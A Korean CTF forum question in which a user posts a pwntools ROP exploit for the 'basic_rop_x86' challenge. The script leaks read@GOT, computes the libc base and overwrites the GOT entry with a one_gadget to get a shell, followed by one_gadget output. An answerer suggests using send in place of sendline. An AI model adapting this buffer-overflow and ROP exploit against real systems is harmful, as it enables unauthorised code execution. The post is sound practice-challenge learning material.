one_gadget이용 풀이
from pwn import *
context.log_level = 'debug'
p = remote('host1.dreamhack.games', 21445)
libc = ELF("./libc.so.6")
e = ELF("./basic_rop_x86")
read_got = e.got['read']
write_plt = e.plt['write']
read_plt = e.plt['read']
read_offset = libc.symbols['read']
pppr = 0x8048689
one_gadget_offset = 0x5f066
payload = ''
payload += 'a'* 0x48
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)
payload += p32(read_plt)
p.sendline(payload)
dummy = p.recv(0x40)
read_addr = u32(p.recv(4))
#print hex(read_addr)
libc_base = read_addr - read_offset
one_gadget = libc_base + one_gadget_offset
#print hex(one_gadget)
p.sendline(p32(one_gadget))
p.interactive()
$ one_gadget ./libc.so.6
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
esi is the GOT address of libc
[esp+0x28] == NULL
0x3a80e execve("/bin/sh", esp+0x2c, environ)
constraints:
esi is the GOT address of libc
[esp+0x2c] == NULL
0x3a812 execve("/bin/sh", esp+0x30, environ)
constraints:
esi is the GOT address of libc
[esp+0x30] == NULL
0x3a819 execve("/bin/sh", esp+0x34, environ)
constraints:
esi is the GOT address of libc
[esp+0x34] == NULL
0x5f065 execl("/bin/sh", eax)
constraints:
esi is the GOT address of libc
eax == NULL
0x5f066 execl("/bin/sh", [esp])
constraints:
esi is the GOT address of libc
[esp] == NULL
one_gadget을 이용해셔 풀려고 했는데 문제에서 준 libc파일에서 나오는 one_gadget모두를 써보았으나 eof에러가 납니다.
혹시 exploit 중에 문제가 있는지 봐 주실 수 있나요?
#pwnable
답변
1
snwo
CTF First Place
페이로드는 문제가 없어보이는데 sendline 말고 send 써보세여!
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기 지식을 나누고 포인트를 획득해보세요.
